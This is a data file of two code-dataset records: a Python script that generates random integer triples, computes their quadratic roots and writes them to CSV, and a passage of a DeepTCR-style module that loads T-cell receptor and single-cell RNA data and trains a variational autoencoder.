+{"seq_id":"39605516987","text":"from copy import deepcopy\nfrom typing import Callable\nfrom random import randint, choices\nfrom pathlib import Path\n\nimport csv\n\ntry:\n from roots_x_pow2 import roots\n from csv_to_json import json_converter, OUT\nexcept ImportError:\n from .roots_x_pow2 import roots\n from .csv_to_json import json_converter, OUT\n\nFILENAME = Path(\"rand_ints.csv\")\nREPETITIONS = randint(100, 1000)\nHEADERS = (\"a\", \"b\", \"c\")\n\n\ndef wr_roots(func: Callable):\n def wrapper(*args, **kwargs):\n \"\"\"why the hell? why the hell? why the hell?\"\"\"\n temp = next(iter(func(args[0])))\n a, b, c = temp.values()\n temp.update({\"out\": roots(a, b, c)})\n return temp\n\n return wrapper\n\n\ndef repeat(n: int):\n def repeat_deco(func: Callable):\n def wrapper(*args, **kwargs):\n nonlocal n\n out: list[dict[str, int]] = []\n for i in range(n):\n out.append(\n func(args[0])\n )\n return out\n\n return wrapper\n\n return repeat_deco\n\n\ndef to_csv(name: Path):\n global HEADERS\n\n def dump(func: Callable):\n def wrapper(*args, **kwargs):\n nonlocal name\n temp = func(args[0])\n\n with open(name, mode=\"wt\", encoding=\"utf-8\") as core:\n blank = csv.DictWriter(f=core, dialect=\"excel\", fieldnames=HEADERS)\n blank.writeheader()\n for line in temp:\n tmp = deepcopy(line)\n tmp.pop(\"out\")\n blank.writerow(tmp)\n return temp\n\n return wrapper\n\n return dump\n\n\n@json_converter(OUT)\n@to_csv(FILENAME)\n@repeat(REPETITIONS)\n@wr_roots\ndef worker(*args):\n less_m = abs(args[0]) if args[0] else 100\n while True:\n yield {\n HEADERS[0]: randint(0, less_m),\n HEADERS[1]: randint(0, less_m),\n HEADERS[2]: randint(0, less_m)\n }\n\n\nif __name__ == '__main__':\n worker()\n","repo_name":"am1bestofluck/python_insight","sub_path":"dz9/content/int_spam.py","file_name":"int_spam.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"39166912484","text":"import sys\n\nsys.path.append('../')\nfrom functions.Layers import *\nfrom functions.data_processing import *\nfrom functions.utils_s import *\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nimport glob\nimport seaborn as sns\nimport umap.umap_ as umap\nimport warnings\nimport shutil\nfrom multiprocessing.pool import Pool \nfrom scipy.spatial.distance import pdist, squareform\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\n\nclass DeepTCR_base(object):\n\n def __init__(self,Name,max_length=40,device=0,tf_verbosity=3):\n \"\"\"\n # Initialize Training Object.\n Initializes object and sets initial parameters.\n All DeepTCR algorithms begin with initializing a training object. This object will contain all methods, data, and results during the training process. One can extract learned features, per-sequence predictions, among other outputs from DeepTCR and use those in their own analyses as well.\n Args:\n Name (str): Name of the object. 
This name will be used to create folders with results as well as a folder with parameters and specifications for any models built/trained.\n max_length (int): maximum length of CDR3 sequence.\n device (int): In the case the user is using tensorflow-gpu, one can specify the particular device to build the graphs on. This selects which GPU the user wants to put the graph and train on.\n tf_verbosity (str): determines how much tensorflow log output to display while training.\n 0 = all messages are logged (default behavior)\n 1 = INFO messages are not printed\n 2 = INFO and WARNING messages are not printed\n 3 = INFO, WARNING, and ERROR messages are not printed\n \"\"\"\n\n #Assign parameters\n self.Name = Name\n self.max_length = max_length\n self.use_beta = False\n self.use_alpha = False\n self.device = '/device:GPU:'+str(device)\n self.use_v_beta = False\n self.use_d_beta = False\n self.use_j_beta = False\n self.use_v_alpha = False\n self.use_j_alpha = False\n self.use_rna = False\n self.regression = False\n self.unknown_str = '__unknown__'\n\n #Create dataframes for assigning AA to ints\n aa_idx, aa_mat = make_aa_df()\n aa_idx_inv = {v: k for k, v in aa_idx.items()}\n self.aa_idx = aa_idx\n self.aa_idx_inv = aa_idx_inv\n\n #Create directory for results of analysis\n directory = os.path.join(self.Name,'results')\n self.directory_results = directory\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Create directory for any temporary files\n directory = self.Name\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n tf.compat.v1.disable_eager_execution()\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(tf_verbosity)\n\n def Get_Data(self,directory,file_rna,classes=None, n_jobs=40,\n aa_column_alpha = None,aa_column_beta = None, count_column = None,sep='\\t',aggregate_by_aa=True,\n v_alpha_column=None,j_alpha_column=None,\n v_beta_column=None,j_beta_column=None,d_beta_column=None, p=None):\n \"\"\"\n # Get Data for DeepTCR\n Parse Data into appropriate inputs for neural network from directories where data is stored.\n This method can be used when your data is stored in directories and you want to load it from directories into DeepTCR. This method takes care of all pre-processing of the data including:\n - Combining all CDR3 sequences with the same nucleotide sequence (optional).\n - Removing any sequences with non-IUPAC characters.\n - Removing any sequences that are longer than the max_length set when initializing the training object.\n - Determining how much of the data per file to use (type_of_data_cut)\n Args:\n directory (str): Path to directory with folders in which tsv/csv files are present for analysis. Folder names become labels for files within them. If the directory contains the TCRSeq files not organized into classes/labels, DeepTCR will load all files within that directory.\n file_rna (str): Path to scRNA-seq file. Rows are cells, and columns are genes.\n classes (list): Optional selection of input of which sub-directories to use for analysis.\n type_of_data_cut (str): Method by which one wants to sample from the TCRSeq File.\n ###\n Options are:\n - Fraction_Response: A fraction (0 - 1) that samples the top fraction of the file by reads. For example, if one wants to sample the top 25% of reads, one would use this threshold with a data_cut = 0.25. The idea of this sampling is akin to sampling a fraction of cells from the file.\n - Frequency_Cut: If one wants to select clones above a given frequency threshold, one would use this threshold. For example, if one wanted to only use clones above 1%, one would enter a data_cut value of 0.01.\n - Num_Seq: If one wants to take the top N number of clones, one would use this threshold. For example, if one wanted to select the top 10 amino acid clones from each file, they would enter a data_cut value of 10.\n - Read_Cut: If one wants to take amino acid clones with at least a certain number of reads, one would use this threshold. For example, if one wanted to only use clones with at least 10 reads, they would enter a data_cut value of 10.\n - Read_Sum: If one wants to take a given number of reads from each file, one would use this threshold. For example, if one wants to use the sequences comprising the top 100 reads of the file, they would enter a data_cut value of 100.\n data_cut (float or int): Value associated with type_of_data_cut parameter.\n n_jobs (int): Number of processes to use for parallelized operations.\n aa_column_alpha (int): Column where alpha chain amino acid data is stored. (0-indexed).\n aa_column_beta (int): Column where beta chain amino acid data is stored. (0-indexed)\n count_column (int): Column where counts are stored.\n sep (str): Type of delimiter used in file with TCRSeq data.\n aggregate_by_aa (bool): Choose to aggregate sequences by unique amino-acid. Defaults to True. If set to False, will allow duplicates of the same amino acid sequence given it comes from different nucleotide clones.\n v_alpha_column (int): Column where v_alpha gene information is stored.\n j_alpha_column (int): Column where j_alpha gene information is stored.\n v_beta_column (int): Column where v_beta gene information is stored.\n d_beta_column (int): Column where d_beta gene information is stored.\n j_beta_column (int): Column where j_beta gene information is stored.\n p (multiprocessing pool object): For parallelized operations, one can pass a multiprocessing pool object to this method.\n Returns:\n variables into training object\n - self.alpha_sequences (ndarray): array with alpha sequences (if provided)\n - self.beta_sequences (ndarray): array with beta sequences (if provided)\n - self.class_id (ndarray): array with sequence class labels\n - self.sample_id (ndarray): array with sequence file labels\n - self.freq (ndarray): array with sequence frequencies from samples\n - self.counts (ndarray): array with sequence counts from samples\n - self.(v/d/j)_(alpha/beta) (ndarray): array with sequence (v/d/j)-(alpha/beta) usage\n \"\"\"\n\n if aa_column_alpha is not None:\n self.use_alpha = True\n\n if aa_column_beta is not None:\n self.use_beta = True\n\n if v_alpha_column is not None:\n self.use_v_alpha = True\n\n if j_alpha_column is not None:\n self.use_j_alpha = True\n\n if v_beta_column is not None:\n self.use_v_beta = True\n\n if d_beta_column is not None:\n self.use_d_beta = True\n\n if j_beta_column is not None:\n self.use_j_beta = True\n\n\n #Determine classes based on directory names\n data_in_dirs = True\n if classes is None:\n classes = [d for d in os.listdir(directory) if os.path.isdir(os.path.join(directory,d))]\n classes = [f for f in classes if not f.startswith('.')]\n if not classes:\n classes = ['None']\n data_in_dirs = False\n\n self.lb = LabelEncoder()\n self.lb.fit(classes)\n self.classes = self.lb.classes_\n\n if p is None:\n p_ = Pool(n_jobs)\n else:\n p_ = p\n \n if sep == '\\t':\n ext = '*.tsv'\n elif sep == ',':\n ext = '*.csv'\n else:\n print('Not Valid Delimiter')\n return\n\n #Get data from tcr-seq files\n alpha_sequences = []\n beta_sequences = []\n v_beta = []\n 
d_beta = []\n j_beta = []\n v_alpha = []\n j_alpha = []\n label_id = []\n file_id = []\n freq = []\n counts=[]\n file_list = []\n seq_index = []\n print('Loading Data...')\n for type in self.classes:\n if data_in_dirs:\n files_read = glob.glob(os.path.join(directory, type, ext))\n else:\n files_read = glob.glob(os.path.join(directory,ext))\n num_ins = len(files_read)\n args = list(zip(files_read,\n [aa_column_alpha] * num_ins,\n [aa_column_beta] * num_ins,\n [count_column] * num_ins,\n [sep] * num_ins,\n [self.max_length]*num_ins,\n [aggregate_by_aa]*num_ins,\n [v_beta_column]*num_ins,\n [d_beta_column]*num_ins,\n [j_beta_column]*num_ins,\n [v_alpha_column]*num_ins,\n [j_alpha_column]*num_ins))\n\n DF = p_.starmap(Get_DF_Data, args)\n\n DF_temp = []\n files_read_temp = []\n for df,file in zip(DF,files_read):\n if df.empty is False:\n DF_temp.append(df)\n files_read_temp.append(file)\n\n DF = DF_temp\n files_read = files_read_temp\n\n for df, file in zip(DF, files_read):\n if aa_column_alpha is not None:\n alpha_sequences += df['alpha'].tolist()\n if aa_column_beta is not None:\n beta_sequences += df['beta'].tolist()\n\n if v_alpha_column is not None:\n v_alpha += df['v_alpha'].tolist()\n\n if j_alpha_column is not None:\n j_alpha += df['j_alpha'].tolist()\n\n if v_beta_column is not None:\n v_beta += df['v_beta'].tolist()\n\n if d_beta_column is not None:\n d_beta += df['d_beta'].tolist()\n\n if j_beta_column is not None:\n j_beta += df['j_beta'].tolist()\n\n label_id += [type] * len(df)\n file_id += [file.split('/')[-1]] * len(df)\n file_list.append(file.split('/')[-1])\n freq += df['Frequency'].tolist()\n counts += df['counts'].tolist()\n seq_index += df.index.tolist()\n\n alpha_sequences = np.asarray(alpha_sequences)\n beta_sequences = np.asarray(beta_sequences)\n v_beta = np.asarray(v_beta)\n d_beta = np.asarray(d_beta)\n j_beta = np.asarray(j_beta)\n v_alpha = np.asarray(v_alpha)\n j_alpha = np.asarray(j_alpha)\n label_id = np.asarray(label_id)\n file_id = np.asarray(file_id)\n freq = np.asarray(freq)\n counts = np.asarray(counts)\n seq_index = np.asarray(seq_index)\n\n Y = self.lb.transform(label_id)\n OH = OneHotEncoder(sparse=False,categories='auto')\n Y = OH.fit_transform(Y.reshape(-1,1))\n\n print('Embedding Sequences...')\n #transform sequences into numerical space\n if aa_column_alpha is not None:\n args = list(zip(alpha_sequences, [self.aa_idx] * len(alpha_sequences), [self.max_length] * len(alpha_sequences)))\n result = p_.starmap(Embed_Seq_Num, args)\n sequences_num = np.vstack(result)\n X_Seq_alpha = np.expand_dims(sequences_num, 1)\n\n if aa_column_beta is not None:\n args = list(zip(beta_sequences, [self.aa_idx] * len(beta_sequences), [self.max_length] * len(beta_sequences)))\n result = p_.starmap(Embed_Seq_Num, args)\n sequences_num = np.vstack(result)\n X_Seq_beta = np.expand_dims(sequences_num, 1)\n\n if self.use_alpha is False:\n X_Seq_alpha = np.zeros(shape=[len(label_id)])\n alpha_sequences = np.asarray([None]*len(label_id))\n\n if self.use_beta is False:\n X_Seq_beta = np.zeros(shape=[len(label_id)])\n beta_sequences = np.asarray([None]*len(label_id))\n\n if p is None:\n p_.close()\n p_.join()\n\n #transform v/d/j genes into categorical space\n num_seq = X_Seq_alpha.shape[0]\n if self.use_v_beta is True:\n self.lb_v_beta = LabelEncoder()\n self.lb_v_beta.classes_ = np.insert(np.unique(v_beta), 0, self.unknown_str)\n v_beta_num = self.lb_v_beta.transform(v_beta)\n else:\n self.lb_v_beta = LabelEncoder()\n v_beta_num = np.zeros(shape=[num_seq])\n v_beta = 
np.asarray([None]*len(label_id))\n\n if self.use_d_beta is True:\n self.lb_d_beta = LabelEncoder()\n self.lb_d_beta.classes_ = np.insert(np.unique(d_beta), 0, self.unknown_str)\n d_beta_num = self.lb_d_beta.transform(d_beta)\n else:\n self.lb_d_beta = LabelEncoder()\n d_beta_num = np.zeros(shape=[num_seq])\n d_beta = np.asarray([None]*len(label_id))\n\n if self.use_j_beta is True:\n self.lb_j_beta = LabelEncoder()\n self.lb_j_beta.classes_ = np.insert(np.unique(j_beta), 0, self.unknown_str)\n j_beta_num = self.lb_j_beta.transform(j_beta)\n else:\n self.lb_j_beta = LabelEncoder()\n j_beta_num = np.zeros(shape=[num_seq])\n j_beta = np.asarray([None]*len(label_id))\n\n if self.use_v_alpha is True:\n self.lb_v_alpha = LabelEncoder()\n self.lb_v_alpha.classes_ = np.insert(np.unique(v_alpha), 0, self.unknown_str)\n v_alpha_num = self.lb_v_alpha.transform(v_alpha)\n else:\n self.lb_v_alpha = LabelEncoder()\n v_alpha_num = np.zeros(shape=[num_seq])\n v_alpha = np.asarray([None]*len(label_id))\n\n if self.use_j_alpha is True:\n self.lb_j_alpha = LabelEncoder()\n self.lb_j_alpha.classes_ = np.insert(np.unique(j_alpha), 0, self.unknown_str)\n j_alpha_num = self.lb_j_alpha.transform(j_alpha)\n else:\n self.lb_j_alpha = LabelEncoder()\n j_alpha_num = np.zeros(shape=[num_seq])\n j_alpha = np.asarray([None]*len(label_id))\n\n print('Read in scRNA-seq data...')\n sc = pd.read_csv(file_rna, sep=sep, index_col=0)\n # mat = np.expand_dims(np.asarray(sc),1)\n mat = np.asarray(sc)\n barcode = np.asarray(sc.index)\n gene = np.asarray(sc.columns)\n\n# with open(os.path.join(self.Name,'Data.pkl'), 'wb') as f:\n# pickle.dump([X_Seq_alpha,X_Seq_beta,Y, alpha_sequences,beta_sequences, label_id, file_id, freq,counts,seq_index,\n# self.lb,file_list,self.use_alpha,self.use_beta,\n# self.lb_v_beta, self.lb_d_beta, self.lb_j_beta,self.lb_v_alpha,self.lb_j_alpha,\n# v_beta, d_beta,j_beta,v_alpha,j_alpha,\n# v_beta_num, d_beta_num, j_beta_num,v_alpha_num,j_alpha_num, mat, barcode, gene,\n# self.use_v_beta,self.use_d_beta,self.use_j_beta,self.use_v_alpha,self.use_j_alpha],f,protocol=4)\n\n\n self.X_Seq_alpha = X_Seq_alpha\n self.X_Seq_beta = X_Seq_beta\n self.Y = Y\n self.alpha_sequences = alpha_sequences\n self.beta_sequences = beta_sequences\n self.class_id = label_id\n self.sample_id = file_id\n self.freq = freq\n self.counts = counts\n self.sample_list = file_list\n self.v_beta = v_beta\n self.v_beta_num = v_beta_num\n self.d_beta = d_beta\n self.d_beta_num = d_beta_num\n self.j_beta = j_beta\n self.j_beta_num = j_beta_num\n self.v_alpha = v_alpha\n self.v_alpha_num = v_alpha_num\n self.j_alpha = j_alpha\n self.j_alpha_num = j_alpha_num\n self.mat = mat\n self.barcode = barcode\n self.gene = gene\n self.seq_index = np.asarray(list(range(len(self.Y))))\n self.predicted = np.zeros((len(self.Y),len(self.lb.classes_)))\n print('Data Loaded')\n\nclass vis_class(object):\n\n def UMAP_Plot(self, set='all', class_id=None, by_class=False, by_cluster=False,\n by_sample=False, freq_weight=False, show_legend=True,\n scale=100,alpha=1.0,sample=None,sample_per_class=None,filename=None,\n prob_plot=None,plot_by_class=False):\n\n \"\"\"\n # UMAP visualization of TCR Sequences\n This method displays the sequences in a 2-dimensional UMAP where the user can color code points by class label, sample label, or a previously computed clustering solution. Size of points can also be made to be proportional to frequency of sequence within sample.\n Args:\n set (str): To choose which set of sequences to analyze, enter either 'all', 'train', 'valid', or 'test'. Since the sequences in the train set may be overfit, it is preferable to generally examine the test set on its own.\n by_class (bool): To color the points by their class label, set to True.\n by_sample (bool): To color the points by their sample label, set to True.\n by_cluster (bool): To color the points by the previously computed clustering solution, set to True.\n freq_weight (bool): To scale size of points proportionally to their frequency, set to True.\n show_legend (bool): To display legend, set to True.\n scale (float): To change size of points, change scale parameter. This is particularly useful when finding a good display size when points are scaled by frequency.\n alpha (float): Value between 0-1 that controls transparency of points.\n sample (int): Number of events to sub-sample for visualization.\n sample_per_class (int): Number of events to randomly sample per class for UMAP.\n filename (str): To save umap plot to results folder, enter a name for the file and the umap will be saved to the results directory. e.g. umap.png\n prob_plot (str): To plot the predicted probabilities for the sequences as an additional heatmap, specify the class probability one wants to visualize (i.e. if the class of interest is class A, input 'A' as a string). Of note, only probabilities determined from the sequences in the test set are displayed as a means of not showing over-fit probabilities. Therefore, it is best to use this parameter when the set parameter is set to 'test'.\n \"\"\"\n idx = None\n features = self.features\n class_id = self.class_id\n sample_id = self.sample_id\n freq = self.freq\n predicted = self.predicted\n if hasattr(self, 'Cluster_Assignments'):\n IDX = self.Cluster_Assignments\n else:\n IDX = None\n\n if sample_per_class is not None and sample is not None:\n print(\"sample_per_class and sample cannot be assigned simultaneously\")\n return\n\n if sample is not None:\n idx = np.random.choice(range(len(features)), sample, replace=False)\n features = features[idx]\n class_id = class_id[idx]\n sample_id = sample_id[idx]\n freq = freq[idx]\n predicted = predicted[idx]\n if hasattr(self, 'Cluster_Assignments'):\n IDX = IDX[idx]\n else:\n IDX = None\n\n if sample_per_class is not None:\n features_temp = []\n class_temp = []\n sample_temp = []\n freq_temp = []\n predicted_temp = []\n cluster_temp = []\n\n for i in self.lb.classes_:\n sel = np.where(class_id == i)[0]\n sel = np.random.choice(sel, sample_per_class, replace=False)\n features_temp.append(features[sel])\n class_temp.append(class_id[sel])\n sample_temp.append(sample_id[sel])\n freq_temp.append(freq[sel])\n predicted_temp.append(predicted[sel])\n if hasattr(self, 'Cluster_Assignments'):\n cluster_temp.append(IDX[sel])\n\n features = np.vstack(features_temp)\n class_id = np.hstack(class_temp)\n sample_id = np.hstack(sample_temp)\n freq = np.hstack(freq_temp)\n predicted = np.hstack(predicted_temp)\n if hasattr(self, 'Cluster_Assignments'):\n IDX = np.hstack(cluster_temp)\n\n pca = PCA(n_components=20)\n umap_obj = umap.UMAP()\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n X_2 = umap_obj.fit_transform(pca.fit_transform(features))\n with open(os.path.join(self.Name, 'umap.pkl'), 'wb') as f:\n pickle.dump([X_2,features,class_id,sample_id,freq,IDX,idx], f, protocol=4)\n\n df_plot = pd.DataFrame()\n df_plot['x'] = 
X_2[:, 0]\n df_plot['y'] = X_2[:, 1]\n df_plot['Class'] = class_id\n df_plot['Sample'] = sample_id\n\n if prob_plot is not None:\n df_plot['Predicted'] = predicted[:,self.lb.transform([prob_plot])[0]]\n\n if set != 'all':\n df_plot['Set'] = None\n with pd.option_context('mode.chained_assignment',None):\n df_plot['Set'].iloc[np.where(self.train_idx)[0]] = 'train'\n df_plot['Set'].iloc[np.where(self.valid_idx)[0]] = 'valid'\n df_plot['Set'].iloc[np.where(self.test_idx)[0]] = 'test'\n\n if IDX is not None:\n IDX[IDX == -1] = np.max(IDX) + 1\n IDX = ['Cluster_' + str(I) for I in IDX]\n df_plot['Cluster'] = IDX\n\n if freq_weight is True:\n s = freq * scale\n else:\n s = scale\n\n df_plot['s']=s\n\n if show_legend is True:\n legend = 'full'\n else:\n legend = False\n\n if by_class is True:\n hue = 'Class'\n elif by_cluster is True:\n hue = 'Cluster'\n elif by_sample is True:\n hue = 'Sample'\n else:\n hue = None\n\n if set == 'all':\n df_plot_sel = df_plot\n elif set == 'train':\n df_plot_sel = df_plot[df_plot['Set']=='train']\n elif set == 'valid':\n df_plot_sel = df_plot[df_plot['Set']=='valid']\n elif set == 'test':\n df_plot_sel = df_plot[df_plot['Set']=='test']\n\n df_plot_sel = df_plot_sel.sample(frac=1)\n print(df_plot_sel['Class'])\n plt.figure()\n sns.scatterplot(data=df_plot_sel, x='x', y='y', s=df_plot_sel['s'], hue=hue, legend=legend, alpha=alpha, linewidth=0.0)\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('')\n plt.ylabel('')\n\n if filename is not None:\n plt.savefig(os.path.join(self.directory_results, filename))\n\n if prob_plot is not None:\n plt.figure()\n plt.scatter(df_plot_sel['x'],df_plot_sel['y'],c=df_plot_sel['Predicted'],s=df_plot_sel['s'],\n alpha=alpha,cmap='bwr')\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('')\n plt.ylabel('')\n\n if filename is not None:\n plt.savefig(os.path.join(self.directory_results, 'prob_'+filename))\n\n if plot_by_class is True:\n for i in self.lb.classes_:\n sel = df_plot_sel['Class']==i\n plt.figure()\n sns.scatterplot(data=df_plot_sel[sel], x='x', y='y', s=df_plot_sel['s'][sel], hue=hue, legend=legend, alpha=alpha,\n linewidth=0.0)\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('')\n plt.ylabel('')\n \n self.umap = X_2\n\nclass DeepTCR_U(DeepTCR_base,vis_class):\n\n def _reset_models(self):\n self.models_dir = os.path.join(self.Name,'models')\n if os.path.exists(self.models_dir):\n shutil.rmtree(self.models_dir)\n os.makedirs(self.models_dir)\n\n # latent_dim=64\n def Train_VAE(self,latent_dim=256, kernel = 5, trainable_embedding=True, embedding_dim_aa = 64, embedding_dim_genes = 48, embedding_dim_rna = 1024,\n use_only_seq=False,use_only_gene=False,size_of_net='medium',latent_alpha=1e-3,rna_alpha=1, gene_alpha=1, seq_alpha=1, var_explained=None,graph_seed=2022,\n batch_size=64, epochs_min=0,stop_criterion=0.01,stop_criterion_window=30, accuracy_min=None,\n suppress_output = False,learning_rate=0.001,split_seed=2022, include_RNA = True):\n\n \"\"\"\n # Train Variational Autoencoder (VAE)\n This method trains the network and saves feature values for sequences for a variety of downstream analyses that can either be done within the DeepTCR framework or by the user by simply extracting out the learned representations.\n Args:\n latent_dim (int): Number of latent dimensions for VAE.\n kernel (int): The motif k-mer of the first convolutional layer of the graph.\n trainable_embedding (bool): Toggle to control whether a trainable embedding layer is used or native one-hot representation for convolutional layers.\n embedding_dim_aa (int): Learned latent dimensionality of amino-acids.\n embedding_dim_genes (int): Learned latent dimensionality of VDJ genes\n embedding_dim_rna (int): Learned latent dimensionality of RNA\n use_only_seq (bool): To only use sequence features, set to True.\n use_only_gene (bool): To only use gene-usage features, set to True.\n size_of_net (list or str): The convolutional stack of this network has 3 layers for which the user can modify the number of neurons per layer. The user can either specify the size of the network with the following options:\n - small == [12,32,64] neurons for the 3 respective layers\n - medium == [32,64,128] neurons for the 3 respective layers\n - large == [64,128,256] neurons for the 3 respective layers\n - custom, where the user supplies a list with the number of neurons for the respective layers\n i.e. [3,3,3] would have 3 neurons for all 3 layers.\n One can also adjust the number of layers for the convolutional stack by changing the length of\n this list. [3,3,3] = 3 layers, [3,3,3,3] = 4 layers.\n latent_alpha (float): Penalty coefficient for latent loss. This value changes the degree of latent regularization on the VAE.\n var_explained (float (0-1.0)): Following training, one can select the number of latent features that explain N% of the variance in the data. The output of the method will be the features in order of the explained variance.\n graph_seed (int): For deterministic initialization of weights of the graph, set this to value of choice.\n batch_size (int): Size of batch to be used for each training iteration of the net.\n epochs_min (int): The minimum number of epochs to train the autoencoder.\n stop_criterion (float): Minimum percent decrease in determined interval (below) to continue training. Used as early stopping criterion.\n stop_criterion_window (int): The window of data to apply the stopping criterion.\n accuracy_min (float): Minimum reconstruction accuracy before terminating training.\n suppress_output (bool): To suppress command line output with training statistics, set to True.\n split_seed (int): For deterministic batching of data during training, one can set this parameter to value of choice.\n Returns:\n VAE Features\n - self.features (array):\n An n x latent_dim array containing features for all sequences\n - self.explained_variance_ (array):\n The explained variance for the N number of latent features in order of descending value.\n - self.explained_variance_ratio_ (array):\n The explained variance ratio for the N number of latent features in order of descending value.\n ---------------------------------------\n \"\"\"\n\n GO = graph_object()\n GO.size_of_net = size_of_net\n GO.embedding_dim_genes = embedding_dim_genes\n GO.embedding_dim_aa = embedding_dim_aa\n GO.embedding_dim_rna = embedding_dim_rna\n GO.l2_reg = 0.0\n\n graph_model_AE = tf.Graph()\n with graph_model_AE.device(self.device):\n with graph_model_AE.as_default():\n if graph_seed is not None:\n tf.compat.v1.set_random_seed(graph_seed)\n\n GO.net = 'ae'\n GO.Features = Conv_Model(GO, self, trainable_embedding, kernel, use_only_seq, use_only_gene, include_RNA)\n # fc = tf.compat.v1.layers.dense(GO.Features, 256)\n fc = tf.compat.v1.layers.dense(GO.Features, 512, tf.nn.relu)\n fc = tf.compat.v1.layers.dense(fc, latent_dim, tf.nn.relu)\n # z_mean = tf.compat.v1.layers.dense(GO.Features, latent_dim, tf.nn.relu)\n # z_log_var = tf.compat.v1.layers.dense(GO.Features, latent_dim, tf.nn.relu)\n z_w = tf.compat.v1.get_variable(name='z_w',shape=[latent_dim,latent_dim])\n z_mean 
= tf.matmul(fc,z_w)\n z_log_var = tf.compat.v1.layers.dense(fc, latent_dim, activation=tf.nn.softplus, name='z_log_var')\n latent_cost = Latent_Loss(z_log_var,z_mean,alpha=latent_alpha)\n\n z = z_mean + tf.exp(z_log_var / 2) * tf.random.normal(tf.shape(input=z_mean), 0.0, 1.0, dtype=tf.float32)\n z = tf.identity(z, name='z')\n\n # fc_up = tf.compat.v1.layers.dense(z, 128)\n # fc_up = tf.compat.v1.layers.denGet_RNA_Lossse(fc_up, 256)\n fc_up = tf.compat.v1.layers.dense(z, 512, tf.nn.relu)\n # fc_up = tf.compat.v1.layers.dense(z, embedding_dim_rna, tf.nn.relu)\n fc_up_flat = fc_up\n # fc_up = tf.reshape(fc_up, shape=[-1, 1, 4, 64])\n fc_up = tf.reshape(fc_up, shape=[-1, 1, 4, 128])\n # fc_up = tf.reshape(fc_up, shape=[-1, 1, 4, 100])\n\n ## RNA\n rna_loss = [Get_RNA_Loss(fc_up_flat, GO.embedding_dim_rna, GO.mat, alpha=rna_alpha)]\n\n ## CDR3\n seq_losses = []\n seq_accuracies = []\n if size_of_net == 'small':\n units = [12, 32, 64]\n elif size_of_net == 'medium':\n units = [32, 64, 128]\n elif size_of_net == 'large':\n units = [64, 128, 256]\n else:\n units = size_of_net\n\n if self.use_beta:\n upsample_beta = fc_up\n for _ in range(len(units)-1):\n upsample_beta = tf.compat.v1.layers.conv2d_transpose(upsample_beta, units[-1-_], (1, 3), (1, 2),activation=tf.nn.relu)\n\n kr, str = determine_kr_str(upsample_beta, GO, self)\n\n if trainable_embedding is True:\n upsample3_beta = tf.compat.v1.layers.conv2d_transpose(upsample_beta, GO.embedding_dim_aa, (1, kr),(1, str), activation=tf.nn.relu)\n upsample3_beta = upsample3_beta[:,:,0:self.max_length,:]\n\n embedding_layer_seq_back = tf.transpose(a=GO.embedding_layer_seq, perm=(0, 1, 3, 2))\n logits_AE_beta = tf.squeeze(tf.tensordot(upsample3_beta, embedding_layer_seq_back, axes=(3, 2)),axis=(3, 4), name='logits')\n else:\n logits_AE_beta = tf.compat.v1.layers.conv2d_transpose(upsample_beta, 23, (1, kr),(1, str), activation=tf.nn.relu)\n logits_AE_beta = logits_AE_beta[:,:,0:self.max_length,:]\n\n recon_cost_beta = Recon_Loss(GO.X_Seq_beta, logits_AE_beta,alpha=seq_alpha)\n seq_losses.append(recon_cost_beta)\n\n predicted_beta = tf.squeeze(tf.argmax(input=logits_AE_beta, axis=3), axis=1)\n actual_ae_beta = tf.squeeze(GO.X_Seq_beta, axis=1)\n w = tf.cast(tf.squeeze(tf.greater(GO.X_Seq_beta, 0), 1), tf.float32)\n correct_ae_beta = tf.reduce_sum(input_tensor=w * tf.cast(tf.equal(predicted_beta, actual_ae_beta), tf.float32),axis=1) / tf.reduce_sum(input_tensor=w, axis=1)\n\n accuracy_beta = tf.reduce_mean(input_tensor=correct_ae_beta, axis=0)\n seq_accuracies.append(accuracy_beta)\n\n if self.use_alpha:\n upsample_alpha = fc_up\n for _ in range(len(units)-1):\n upsample_alpha = tf.compat.v1.layers.conv2d_transpose(upsample_alpha, units[-1-_], (1, 3), (1, 2),activation=tf.nn.relu)\n\n kr, str = determine_kr_str(upsample_alpha, GO, self)\n\n if trainable_embedding is True:\n upsample3_alpha = tf.compat.v1.layers.conv2d_transpose(upsample_alpha, GO.embedding_dim_aa, (1, kr), (1, str),activation=tf.nn.relu)\n upsample3_alpha = upsample3_alpha[:,:,0:self.max_length,:]\n\n embedding_layer_seq_back = tf.transpose(a=GO.embedding_layer_seq, perm=(0, 1, 3, 2))\n logits_AE_alpha = tf.squeeze(tf.tensordot(upsample3_alpha, embedding_layer_seq_back, axes=(3, 2)),axis=(3, 4), name='logits')\n else:\n logits_AE_alpha = tf.compat.v1.layers.conv2d_transpose(upsample_alpha, 23, (1, kr), (1, str),activation=tf.nn.relu)\n logits_AE_alpha = logits_AE_alpha[:,:,0:self.max_length,:]\n\n recon_cost_alpha = Recon_Loss(GO.X_Seq_alpha, logits_AE_alpha,alpha=seq_alpha)\n 
